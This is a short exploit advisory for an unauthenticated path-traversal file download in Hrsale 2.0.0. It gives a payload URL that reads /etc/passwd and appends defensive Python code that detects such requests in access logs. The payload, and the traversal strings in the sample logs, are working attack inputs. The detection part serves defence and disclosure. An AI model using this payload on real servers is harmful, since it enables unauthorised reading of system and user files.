# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
# Date: 10/21/2020
# Exploit Author: Sosecure
# Vendor Homepage: https://hrsale.com/index.php
# Version: version 2.0.0

Description:
This exploit allows you to download any readable file from the server without permission or a login session.

Payload:
https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd

POC:
1. Access the HRsale application and browse to the download path with the payload
2. Get /etc/passwd
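
Detection for the request shown above, added here as an example and not part of the original advisory: it scans web access log lines for `/download` requests whose `filename` parameter carries a traversal sequence, including percent-encoded and backslash forms. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=5):
    """Undo repeated percent-encoding (%252e%252e -> %2e%2e -> ..)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(filename):
    """True if the value leaves the download directory: a '..' segment or an absolute path."""
    name = decode_fully(filename).replace("\\", "/")
    return name.startswith("/") or ".." in name.split("/")

def suspicious_downloads(log_lines):
    """Return (client_ip, filename) for /download requests whose filename traverses."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.rstrip("/").endswith("/download"):
            continue
        # parse_qs already decodes one layer; is_traversal() handles the rest.
        for name in parse_qs(url.query).get("filename", []):
            if is_traversal(name):
                hits.append((line.split()[0], name))
    return hits

# Constructed sample log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Oct/2020:10:00:01 +0000] "GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1" 200 1432',
    '198.51.100.7 - - [21/Oct/2020:10:00:05 +0000] "GET /download?type=files&filename=%252e%252e%252fnotes.txt HTTP/1.1" 200 512',
    '203.0.113.20 - - [21/Oct/2020:10:01:00 +0000] "GET /download?type=files&filename=payslip_oct.pdf HTTP/1.1" 200 20480',
    '203.0.113.20 - - [21/Oct/2020:10:02:00 +0000] "GET /dashboard HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, name in suspicious_downloads(SAMPLE_LOG):
        print(f"{ip} requested {name!r}")
```

A hit with a 200 status and no authenticated session in the same log stream is the pattern the advisory describes; the same `is_traversal` check can also serve as a server-side input filter in front of the download handler.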